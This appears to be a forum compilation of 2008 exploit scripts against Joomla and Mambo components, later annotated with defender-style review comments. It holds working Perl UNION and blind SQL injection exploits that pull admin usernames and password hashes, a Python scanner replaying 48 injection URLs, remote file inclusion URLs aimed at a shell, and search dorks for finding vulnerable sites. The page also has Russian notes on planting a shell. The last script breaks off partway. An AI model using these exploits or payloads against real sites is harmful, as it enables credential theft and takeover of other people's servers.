Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit Code:
#!/usr/bin/perl
# Review note (defender's reading of this 2008 proof of concept):
#   Class: unauthenticated SQL injection through the `Itemid` request
#   parameter of the com_news_portal component. The payload below only works
#   if that integer parameter reaches the query unsanitised, so the fix on the
#   component side is to cast it to an integer (or bind it as a parameter).
#   Detection: a GET to index.php whose query string carries `union select`,
#   `char(...)` sequences and a trailing `/*`; a failed attempt leaves a MySQL
#   "Syntax error" page or an HTTP 500 in the logs (both are what this script
#   itself treats as failure further down).
#   Code notes: no `use strict`/`use warnings`, so every variable is a package
#   global; the banner string below lost its original line breaks when the
#   page was flattened and is reproduced as found.
#[[Script Name: Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit
#[[Coded by : MEFISTO
#[[Author : ilker Kandemir
#[[Dork : "index.php?option=com_news_portal" or "Powered by iJoomla News Portal"
use IO::Socket;

# Usage banner when no target argument is given.
if(@ARGV < 1){
    print " [[======================================================================== [[// Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit [[// Usage: cnp.pl [target] [[// Example: cnp.pl victim.com [[// Vuln&Exp : iLker Kandemir a.k.a MEFISTO [[// website : www.dumenci.net - [[======================================================================== ";
    exit();
}

#Local variables
$server = $ARGV[0];
# Strip a leading "http://" from the argument. The /e flag evaluates the
# (empty) replacement as a Perl expression, which is a no-op here.
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/index.php?option=com_news_portal&Itemid=";
# Interactive prompt for the install directory. `chop` removes exactly one
# trailing character (the newline), unlike `chomp` which only removes $/.
print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);
if ($dir =~ /exit/){
    print "-- Exploit Failed[You Are Exited] \n";
    exit();
}
# The directory must contain at least one "/" (e.g. "/joomla/").
if ($dir =~ /\//){}
else {
    print "-- Exploit Failed[No DIR] \n";
    exit();
}
# Injected payload. The char(...) sequences spell the literal markers
# "username:" and "password:" so that the extracted row can be located in the
# HTML by the regexes in the read loop. `jos_users` is the default Joomla
# table prefix for the users table.
$target = "-1%20union%20select%20111,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),333%20from%20jos_users/*";
$target = $host.$dir.$file.$target;

#Writing data to socket
# A raw TCP socket is used instead of an HTTP client library; the request is
# written as HTTP/1.1 with "Connection: close" so the server ends the stream.
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";

#Getting
# Read the response line by line looking for the two markers. A MySQL syntax
# error or an "Internal Server Error" body is treated as failure and ends the
# script; otherwise the loop simply runs until the socket closes.
while($answer = <$socket>) {
    if ($answer =~ /username:(.*?)pass/){
        print "+ Exploit succeed! 
Getting admin information.\n";
        print "+ ---------------- +\n";
        print "+ Username: $1\n";
    }
    if ($answer =~ /password:(.*?)border/){
        print "+ Password: $1\n";
    }
    if ($answer =~ /Syntax error/) {
        print "+ Exploit Failed : ( \n";
        print "+**********************************************************************+\n";
        exit();
    }
    if ($answer =~ /Internal Server Error/) {
        print "+ Exploit Failed : ( \n";
        print "+**********************************************************************+\n";
        exit();
    }
}
# milw0rm.com [2008-06-09] milw0rm.com [2008-06-09]
Mambo Component galleries v 1.0 Remote SQL Injection HTML:
#!/usr/bin/perl -w
# Review note (defender's reading of this 2008 proof of concept):
#   Class: unauthenticated UNION-based SQL injection through the `aid`
#   parameter of the Mambo com_galleries component. Two requests are sent:
#   the first selects `username` wrapped in "<user>" markers (that is what the
#   CHAR(60,117,115,101,114,62) sequences spell), the second selects
#   `password` and accepts any 32-hex-digit string in the response as the hash.
#   Mitigation: integer-cast or bind `aid` in the component.
#   Detection: GETs to index.php?option=com_galleries whose query string
#   contains `union select` ... `from/**/mos_users`.
#   Code notes: runs under -w only, without `use strict`; `$b` (the user
#   agent) is also the package variable used by `sort`, a legal but
#   discouraged choice.
# Mambo Component galleries v 1.0 Remote SQL Injection
# ########################################
#[*] Found by : Houssamix From H-T Team
#[*] H-T Team [ HouSSaMix + ToXiC350 ]
#[*] Greetz : bugtr4cker & Stack & HaCkeR_EgY & Hak3r-b0y & All friends & All muslims HaCkeRs :)
#[*] Script_Name: "Mambo"
#[*] Component_Name: galleries v 1.0
########################################
# <mosinstall type="component">
# <name>galleries</name>
#<creationDate>10/04/2006</creationDate>
#<author>Vinay Kr. Singh</author>
#<copyright>This component is released under the GNU License</copyright>
#<authorEmail>[email protected]</authorEmail>
#<authorUrl>www.opensource.com</authorUrl>
#<version>1.0</version>

# Windows console colour command; its return value is not checked.
system("color f");
print "\t\t########################################################\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t########################################################\n\n";
print "\t\t# Mambo Component galleries 1.0 Remote SQL Injection #\n\n";
print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n";
print "\t\t########################################################\n\n";

use LWP::UserAgent;

# Target base URL is read interactively; the prompt suggests a trailing slash.
print "\nEnter your Target (http://site.com/mambo/): ";
chomp(my $target=<STDIN>);
$uname="username";
$passwd="password";
$magic="mos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

# Request 1: username, delimited by "<user>" markers for the regex below.
$host = $target . "/index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62))from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
print "\n[+] The Target : ".$target."";
if ($answer =~ /<user>(.*?)<user>/){
    print "\n[+] Admin User : $1";
}

# Request 2: password column; the first 32-hex-digit string anywhere in the
# page is reported as the hash (no anchoring, so any such string matches).
$host2 = $target . 
"index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,".$passwd."/**/from/**/".$magic."/**";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
    print "\n[+] Admin Hash : $1\n\n";
    print "# Exploit succeed! #\n\n";
}
else{print "\n[-] Exploit Failed...\n"; }
# codec by Houssamix From H-T Team
# milw0rm.com [2008-06-13] milw0rm.com [2008-06-13]
Mambo <= 4.6.4 Remote File Inclusion Vulnerability HTML: .-----------------------------------------------------------------------------. | vuln.: Mambo <= 4.6.4 Remote File Inclusion Vulnerability | | download: http://mambo-foundation.org/ | | | | author: [email protected] | | homepage: http://irk4z.wordpress.com/ | | | | greets to: all friends ;) | '-----------------------------------------------------------------------------' # code: /includes/Cache/Lite/Output.php : 1 <?php 2 3 /** 4 * This class extends Cache_Lite and uses output buffering to get the data to cache. 5 * 6 * There are some examples in the 'docs/examples' file 7 * Technical choices are described in the 'docs/technical' file 8 * 9 * @package Cache_Lite 10 * @version $Id: Output.php,v 1.1 2005/07/22 01:57:13 eddieajau Exp $ 11 * @author Fabien MARTY <[email protected]> 12 */ 13 14 require_once($mosConfig_absolute_path . '/includes/Cache/Lite.php'); ... ^ no comment.. RFI in line 14.. # exploit: http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell? # milw0rm.com [2008-06-13] milw0rm.com [2008-06-13]
Joomla components AstatsPro: /administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(username,password,0x2e,usertype)+from+jos_users+limit+2,1-- Залезть в пхпмайадмин можно узнав пароль с помощью JoomlaXplorer (если таковой установлен), после добычи пароля заходим в компонент JoomlaXplorer, далее ищем configuration.php и читаем логин и пасс от БД. Залить шелл также можно с помощью етого компонента.
Joomla Component expshop Remote SQL injection Joomla Component expshop Remote SQL injection Уязвимость: http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid={SQL} Пример: http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users-- # milw0rm.com [2008-06-22] http://www.milw0rm.com/exploits/5893
Joomla Component com_facileforms 1.4.4 Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «ff_compath» сценарием facileforms.frame.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Эксплоит: www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL] /path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]
Mambo Component Articles Blind SQL Injection 0-day Exploit by Ded MustD!e PHP:
#!/usr/bin/perl
# Review note (defender's reading of this 2008 proof of concept):
#   Class: boolean-based blind SQL injection through the `artid` parameter of
#   the Mambo "articles" component. Nothing is read from the page directly;
#   each request asks one true/false question (`ascii(SUBSTRING(password,i,1))
#   = h`) and the answer is inferred from whether the string "Back" appears in
#   the response. The 32 characters of the first mos_users password hash are
#   recovered one at a time, trying '0'..'9' then 'a'..'z' (up to 36 requests
#   per position).
#   Detection: a burst of up to ~1150 GETs to index.php?option=articles that
#   differ only in the trailing numeric comparison; the `and ascii(SUBSTRING(`
#   fragment is a reliable signature. Mitigation: integer-cast or bind `artid`.
#   Code notes: no `use strict`; `%options` is a file-scoped lexical that the
#   helper `istrue2` reads directly (for the -p proxy).
use LWP::UserAgent;
use Getopt::Long;

# Usage banner unless at least host and path were given.
if(!$ARGV[1]) {
    print " \n";
    print " #######################################################################\n";
    print " # Mambo Component Articles Blind SQL Injection Exploit #\n";
    print " # Author:Ded MustD!e [www.antichat.ru] #\n";
    print " # #\n";
    print " # Dork : inurl:option=articles artid #\n";
    print " # Usage: perl exploit.pl host path <options> #\n";
    print " # Example: perl exploit.pl www.host.com /joomla/ -a 2 #\n";
    print " # #\n";
    print " # Options: #\n";
    print " # -a valid Article id #\n";
    print " #######################################################################\n";
    exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
# $ARGV[2] is read before GetOptions has removed option switches from @ARGV,
# so it may hold a switch name; the -a option below overrides it when given.
my $aid = $ARGV[2];
my %options = ();
# -u user id (parsed but never used in the query), -p HTTP proxy host:port,
# -a article id.
GetOptions(\%options, "u=i", "p=s", "a=i");
print "[~] Exploiting...\n";
if($options{"u"}) { $userid = $options{"u"}; }
if($options{"a"}) { $aid = $options{"a"}; }

# syswrite bypasses STDOUT buffering so each recovered character appears
# as soon as it is found.
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++) {
    my $f = 0;
    my $h = 48;
    # Digits '0'..'9' (ASCII 48..57) first.
    while(!$f && $h <= 57) {
        if(istrue2($host, $path, $userid, $aid, $i, $h)) {
            $f = 1;
            syswrite(STDOUT, chr($h), 1);
        }
        $h++;
    }
    # Then lowercase letters 'a'..'z' (ASCII 97..122).
    if(!$f) {
        $h = 97;
        while(!$f && $h <= 122) {
            if(istrue2($host, $path, $userid, $aid, $i, $h)) {
                $f = 1;
                syswrite(STDOUT, chr($h), 1);
            }
            $h++;
        }
    }
}
print "\n[~] Exploiting done\n";

# istrue2(host, path, uid, aid, i, h): one oracle request. Returns 1 when the
# response body matches /Back/ (interpreted as "character i of the hash is
# chr(h)"), otherwise 0. $uid is accepted but not used in the query.
sub istrue2 {
    my $host = shift;
    my $path = shift;
    my $uid = shift;
    my $aid = shift;
    my $i = shift;
    my $h = shift;
    my $ua = LWP::UserAgent->new;
    my $query = "http://".$host.$path."index.php?option=articles&task=viewarticle&artid=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";
    # Optional HTTP proxy from -p.
    if($options{"p"}) {
        $ua->proxy('http', "http://".$options{"p"});
    }
    my $resp = $ua->get($query);
    my $content = $resp->content;
    my $regexp = "Back";
    if($content =~ /$regexp/) {
        return 1;
    } else {
        return 0;
    }
}
Joomla Component netinvoice Remote SQL injection POC : Code: http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid={SQL} Example: Code: http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users-- (c)milw0rm.com
Joomla Component beamospetition Remote SQL injection [*] Author : His0k4 [ALGERIAN HaCkEr] [*] Dork : inurl:com_beamospetition [*] POC : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet={SQL} [*] Example : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet=-5 UNION SELECT user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users-- ------------------------------------------------------------------------ # milw0rm.com [2008-06-28]
Mambo Component n-gallery SQL Injection Mambo Component n-gallery SQL Injection DORK : allinurl:"com_n-gallery" index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/* milw0rm.com [2008-06-30] и еще Joomla Component Xe webtv Blind SQL Injection Exploit Code:
#!/usr/bin/perl
# Review note (defender's reading of this 2008 proof of concept):
#   Class: boolean-based blind SQL injection through the `id` parameter of
#   the Joomla com_xewebtv component. Each request compares one character of
#   the first jos_users password hash (`SUBSTRING(...) = CHAR(h)`) and the
#   answer is inferred from whether the category link "viewcategory&catid=<cid>"
#   is rendered in the response. 32 positions, '0'..'9' then 'a'..'z'.
#   Detection: a burst of GETs to index.php?option=com_xewebtv&Itemid=60 that
#   differ only in the trailing `=CHAR(nn)`; `SUBSTRING((SELECT password` is a
#   reliable signature. Mitigation: integer-cast or bind `id`.
#   Code notes: no `use strict`; `%options` is a file-scoped lexical read by
#   the helper `istrue2` (for the -p proxy). Same skeleton as the EZ Store
#   script further down the page.
use LWP::UserAgent;
use Getopt::Long;

# Usage banner unless at least host and path were given.
if(!$ARGV[1]) {
    print " \n";
    print " ################################################################\n";
    print " # Joomla Component Xe webtv Blind SQL Injection Exploit #\n";
    print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
    print " # #\n";
    print " # Conctact: His0k4.hlm[at]gamil.com #\n";
    print " # Greetz: All friends & muslims HacKeRs #\n";
    print " # Greetz2: http://www.dz-secure.com #\n";
    print " # http://www.palcastle.org/cc #\n";
    print " # #\n";
    print " # Dork: inurl:com_xewebtv #\n";
    print " # Usage: perl xewebtv.pl host path <options> #\n";
    print " # Example: perl xewebtv.pl www.host.com /joomla/ -t 11 -c 2 #\n";
    print " # #\n";
    print " # Options: #\n";
    print " # -t Valid tv id #\n";
    print " # -c Category value of the following id #\n";
    print " # Note: #\n";
    print " # You can change the match string if you need that #\n";
    print " ################################################################\n";
    exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
# Positional fallbacks, read before GetOptions strips switches from @ARGV;
# -c and -t override them below.
my $cid = $ARGV[2];
my $tid = $ARGV[3];
my %options = ();
# -c category id used in the match string, -p HTTP proxy host:port, -t tv id.
GetOptions(\%options, "c=i", "p=s", "t=i");
print "[~] Exploiting...\n";
if($options{"c"}) { $cid = $options{"c"}; }
if($options{"t"}) { $tid = $options{"t"}; }

# Unbuffered output so each recovered character is shown immediately.
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++) {
    my $f = 0;
    my $h = 48;
    # Digits '0'..'9' (ASCII 48..57) first.
    while(!$f && $h <= 57) {
        if(istrue2($host, $path, $cid, $tid, $i, $h)) {
            $f = 1;
            syswrite(STDOUT, chr($h), 1);
        }
        $h++;
    }
    # Then lowercase letters 'a'..'z' (ASCII 97..122).
    if(!$f) {
        $h = 97;
        while(!$f && $h <= 122) {
            if(istrue2($host, $path, $cid, $tid, $i, $h)) {
                $f = 1;
                syswrite(STDOUT, chr($h), 1);
            }
            $h++;
        }
    }
}
print "\n[~] Exploiting done\n";

# istrue2(host, path, cid, tid, i, h): one oracle request. Returns 1 when the
# response contains "viewcategory&catid=<cid>" (the page rendered normally,
# i.e. the comparison was true), otherwise 0.
sub istrue2 {
    my $host = shift;
    my $path = shift;
    my $cid = shift;
    my $tid = shift;
    my $i = shift;
    my $h = shift;
    my $ua = LWP::UserAgent->new;
    my $query = "http://".$host.$path."index.php?option=com_xewebtv&Itemid=60&func=detail&id=".$tid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
    # Optional HTTP proxy from -p.
    if($options{"p"}) {
        $ua->proxy('http', "http://".$options{"p"});
    }
    my $resp = $ua->get($query);
    my $content = $resp->content;
    # The match string is interpolated into the regex unescaped; it only
    # contains "&", "=" and digits here.
    my $regexp = "viewcategory&catid=".$cid."";
    if($content =~ /$regexp/) {
        return 1;
    } else {
        return 0;
    }
}
# milw0rm.com [2008-06-28]
MamScan v1.0 Mambo Component SQL scanner Code:
#!/usr/bin/python
# Review note (defender's reading of this 2008 Python 2 scanner):
#   It replays 48 publicly disclosed UNION SELECT payloads, one per
#   Mambo/Joomla component, against a single host and flags any 32-hex-digit
#   string found in a response body. Every entry targets the same root cause:
#   a numeric request parameter concatenated into SQL without an integer cast.
#   Detection: one GET every 3 s to index.php with a changing `option=com_*`
#   value and a query string containing `union/**/select` ... `from/**/
#   mos_users` or `jos_users`; the "S@BUN" filler used for Itemid is a
#   recognisable marker of this particular tool.
#   Code notes: the hash regex "[a-f0-9]"*32 has no boundaries, so any
#   32-hex-digit string on the page (session ids, commit hashes) also matches,
#   hence the original author's "check manually" caveat. Only HTTPError is
#   caught; URLError and socket timeouts abort the scan.
#Mambo Component SQL scanner, checks source for md5's
#Uncomment line 44 for verbose mode. If md5 found
#check manually.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import sys, urllib2, re, time

print "\n\t d3hydr8[at]gmail[dot]com MamScan v1.0"
print "\t------------------------------------------"

# One relative URL per known vulnerable component, reproduced verbatim from
# the page. "S@BUN" / "s@bun" / "xxx" are arbitrary filler values for
# parameters the author did not care about.
sqls = [
    "index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*",
    "index.php?option=com_catalogshop&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/null,null,concat(password),3,4,5,6,7,8,9,10,11,12,concat(username)/**/from/**/mos_users/*",
    "index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*",
    "index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users--",
    "index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*",
    "index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*",
    "index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*",
    "index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN",
    "index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
    "index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
    "index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
    "index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*",
    "index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*",
    "index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users",
    "index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*",
    "index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,password%2C0%2C0%2C0/**/from/**/mos_users/*",
    "index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users",
    "index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*",
    "index.php?option=com_gallery&Itemid=0&func=detail&id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users",
    "index.php?option=com_rapidrecipe&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
    "index.php?option=com_rapidrecipe&category_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
    "index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
    "index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*",
    "index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users",
    "index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),0x3a/**/from/**/jos_users/*",
    "index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*",
    "index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*",
    "index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*",
    "index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--",
    "index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--",
    "administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),concat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*",
    "index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*",
    "index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
    "index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
    "index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*",
    "index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*",
    "index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*",
    "index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*",
    "index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*",
    "index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*",
    "index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--",
    "index.php?option=com_accombo&func=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password)/**/from/**/mos_users/*",
    "index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0x3a/**/from/**/mos_users/*",
    "index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*",
    "index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%20union%20select%20concat(CHAR(60,117,115,101,114,62),username,CHAR(60,117,115,101,114,62))from/**/mos_users/**",
    "index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,concat(CHAR(60,117,115,101,114,62),username,CHAR(60,117,115,101,114,62))from/**/mos_users/**",
    "index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/*",
    "index.php?option=com_n-gallery&flokkur=-1+union+select+concat(username,char(58),password)KHG+from+mos_users--"
]

if len(sys.argv) != 2:
    print "\nUsage: ./mamscan.py <site>"
    print "Ex: ./mamscan.py www.test.com\n"
    sys.exit(1)

# Normalise the target: drop a trailing "/index.php", make sure the base ends
# with "/" and starts with "http://".
host = sys.argv[1].replace("/index.php", "")
if host[-1] != "/":
    host = host+"/"
if host[:7] != "http://":
    host = "http://"+host
print "\n[+] Site:",host
print "[+] SQL Loaded:",len(sqls)
print "[+] Starting Scan...\n"

for sql in sqls:
    time.sleep(3) #Change this if needed
    #print "[+] Trying:",host+sql.replace("\n","")
    try:
        source = urllib2.urlopen(host+sql.replace("\n","")).read()
        # "[a-f0-9]"*32 builds a pattern for exactly 32 lowercase hex digits;
        # it is unanchored, so any such run in the page matches.
        md5s = re.findall("[a-f0-9]"*32,source)
        if len(md5s) >= 1:
            print "[!]",host+sql.replace("\n","")
            for md5 in md5s:
                print "\n[+]MD5:",md5
    except(urllib2.HTTPError):
        # Non-2xx responses (e.g. a 500 from a failed injection) are skipped
        # silently; any other exception propagates and ends the scan.
        pass
print "\n[-] Done\n"
Joomla Component altas v 1.0 Multiple Remote SQL Injection Joomla Component altas v 1.0 Multiple Remote SQL Injection Code:
#!/usr/bin/perl -w
# Review note (defender's reading of this 2008 proof of concept):
#   Class: two unauthenticated UNION-based SQL injections in the Joomla
#   com_altas component — the first request injects through the `ano`
#   parameter (username, wrapped in "<user>" markers spelled by the
#   CHAR(60,117,115,101,114,62) sequences), the second through `mes` (password,
#   matched as any 32-hex-digit string). Hence "Multiple" in the title.
#   Mitigation: integer-cast or bind both parameters.
#   Detection: GETs to index.php?option=com_altas whose query string contains
#   `union select` ... `from/**/jos_users`.
#   Code notes: -w only, no `use strict`; `$b` shadows the package variable
#   used by `sort`. Same skeleton as the Mambo galleries script above.
#[*] Dork : index.php?option=com_altas

# Windows console colour command; its return value is not checked.
system("color f");
print "\t\t========================================================\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t========================================================\n\n";
print "\t\t# Joomla Component altas v 1 multiple SQL Injection #\n\n";
print "\t\t========================================================\n\n";
print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n";
print "\t\t========================================================\n\n";

use LWP::UserAgent;

# Target base URL is read interactively; the prompt expects a trailing slash,
# and the request strings below are appended without one.
print "\nEnter your Target (http://site.com/joomla/): ";
chomp(my $target=<STDIN>);
$uname="username";
$magic="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

